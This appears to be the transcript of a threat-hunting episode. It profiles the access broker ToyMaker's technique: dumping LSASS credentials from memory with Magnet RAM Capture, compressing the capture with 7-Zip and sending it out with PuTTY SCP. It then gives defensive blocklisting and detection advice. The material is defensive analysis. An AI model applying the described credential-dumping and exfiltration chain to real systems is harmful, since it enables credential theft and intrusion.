Welcome back to the Threat Hunters Corner! I’m Josh Shepard, Principal Threat Hunter at RADICL, and in this episode, we’ll be diving into the tools and tricks employed by a new Initial Access Broker known as ToyMaker.
Hey everyone, how's it going?
Josh Shepard here, and on this edition of the Threat Hunters Corner, we're diving into the activities of a new initial access broker (IAB) known as Toy Maker.
To refresh your memory, an initial access broker is a type of threat actor specializing in gaining initial persistent access to an environment. They then sell this access to the highest bidder, typically ransomware-as-a-service (RaaS) operators or their affiliates. These buyers leverage the persistent access to move laterally within the network and deploy their malware of choice.
Toy Maker has been observed collaborating with several ransomware gangs, including well-known groups such as Cactus. What sets Toy Maker apart is their innovative approach to credential gathering.
Toy Maker focuses on using legitimate tools for credential access. Specifically, they employ the open-source Magnet RAM Capture tool for OS credential dumping. Magnet RAM Capture is a legitimate digital forensics tool used to dump system memory. By capturing live system memory, attackers can access the LSASS (Local Security Authority Subsystem Service) process memory to gather credentials. These credentials are then packaged into their initial access offering, providing buyers with enhanced capabilities for lateral movement and privilege escalation.
After capturing the live system memory, Toy Maker continues to use legitimate tools to avoid detection. They use 7-Zip to compress the RAM capture and the PuTTY SCP client to transfer the file off-network. This trend of using malware-free, legitimate tools has been highlighted in CrowdStrike's 2025 Threat Report.
If your organization does not use Magnet RAM Capture or lacks a go-to forensics tool, consider blocklisting the execution of these binaries. This can be done from a hash or file name perspective. Additionally, you can detect and prevent unauthorized forensics tools by monitoring common command line parameters unique to Magnet RAM Capture. These parameters are harder for threat actors to alter compared to renaming files or changing file hashes.
Another critical aspect to monitor is the use of the PuTTY SCP client for data exfiltration. If your organization does not use PuTTY, you can implement blanket detection or prevention measures. If PuTTY is used but only for SSH, restrict the usage of the PuTTY SCP client to prevent unauthorized data transfers.
Digital forensic tools can gather extensive information from a system. Therefore, maintaining strict control over what is allowed to execute on your systems is crucial. This not only helps in catching malicious activities but also ensures that internal analysts do not perform unauthorized actions.
While Toy Maker employs legitimate tools to evade detection, understanding your environment and knowing which tools are in use can help you implement aggressive detection and prevention measures. This approach will not only help you catch Toy Maker but also deter other threat actors who might copy their techniques.
That's it for this week's Threat Hunters Corner. If you have any questions, please feel free to reach out. Stay safe out there, and we'll see you next week.